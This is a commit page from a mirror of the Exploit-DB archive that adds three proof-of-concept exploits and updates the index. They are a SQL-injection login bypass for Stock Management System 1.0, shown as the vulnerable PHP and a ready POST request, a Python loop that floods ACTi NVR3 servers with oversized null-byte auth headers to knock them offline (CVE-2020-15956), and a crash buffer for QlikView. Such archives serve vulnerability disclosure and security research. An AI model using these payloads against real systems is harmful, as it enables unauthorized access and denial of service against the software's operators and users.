bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-08-06

Browse source 
3 changes to exploits/shellcodes

ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)
QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)

Stock Management System 1.0 - Authentication Bypass
This commit is contained in:
Offensive Security 2020-08-06 05:01:49 +00:00
parent 9384c59418
commit b4336a2935
4 changed files with 139 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

71
exploits/php/webapps/48733.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: Stock Management System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec)
# Date: August 1, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerable Source Code
if($_POST) {
$username = $_POST['username'];
$password = $_POST['password'];
if(empty($username) || empty($password)) {
if($username == "") {
$errors[] = "Username is required";
}
if($password == "") {
$errors[] = "Password is required";
}
} else {
$sql = "SELECT * FROM users WHERE username = '$username'";
$result = $connect->query($sql);
if($result->num_rows == 1) {
$password = md5($password);
// exists
$mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$mainResult = $connect->query($mainSql);
if($mainResult->num_rows == 1) {
$value = $mainResult->fetch_assoc();
$user_id = $value['user_id'];
// set session
$_SESSION['userId'] = $user_id;
header('location: http://localhost/stock/dashboard.php');
} else{
$errors[] = "Incorrect username/password combination";
} // /else
} else {
$errors[] = "Username doesnot exists";
} // /else
} // /else not empty username // password
} // /if $_POST
?>
# Malicious POST Request to https://TARGET/stock/index.php HTTP/1.1
POST /stock/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.222.132/stock/
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+admin&password=badPass

41
exploits/windows/dos/48731.py Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC) #
# Date: 2020-08-04 #
# Exploit Author: MegaMagnus #
# Vendor Homepage: https://www.acti.com/ #
# Software Link: https://www.acti.com/DownloadCenter #
# Version: V.3.0.12.42 , V.2.3.04.07 #
# Tested on: Windows 7, Windows 10 #
# CVE: CVE-2020-15956 #
# This is a Proof of Concept Exploit, Please use responsibly. #
#################################################################################
#!/usr/bin/env python
import requests
from requests.auth import HTTPBasicAuth
import sys
def product_info(server):
try:
r = requests.get(sys.argv[1] + '/media/Product/getProductInfo', timeout=10)
if r.status_code == 200:
print(r.text)
return True
except Exception as e:
print(e)
return False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("usage: cve-2020-15956.py <target>")
exit(-1)
if product_info(sys.argv[1]):
print("Starting DOS. Use Ctrl-C (SIGINT) to stop!")
while True:
try:
payload = b"\x00" * (760)
r = requests.get(sys.argv[1] + '/Media/UserGroup/login', auth=HTTPBasicAuth('Basic',payload), timeout=10)
print(r.status_code)
except KeyboardInterrupt:
pass
except Exception as e:
pass

24
exploits/windows/dos/48732.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2020-08-03
# Vendor Homepage: https://www.qlik.com
# Software Link: https://www.qlik.com/us/trial/qlik-sense-business
# Tested Version: 12.50.20000.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code: QlikView_12.50.20000.0.py
# 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard
# 3.- Open "QlikView 12"
# 4.- File -> "Open FTP ..."
# 5.- Paste ClipBoard on "FTP Server Address"
# 6.- Connect
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 300
f = open ("QlikView_12.50.20000.0.txt", "w")
f.write(buffer)
f.close()

3
files_exploits.csv
View file

@ -6757,6 +6757,8 @@ id,file,description,date,author,type,platform,port
48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows, 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42972,3 +42974,4 @@ id,file,description,date,author,type,platform,port
48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php, 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,
48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python, 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,
48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php, 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,
48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,

Can't render this file because it is too large.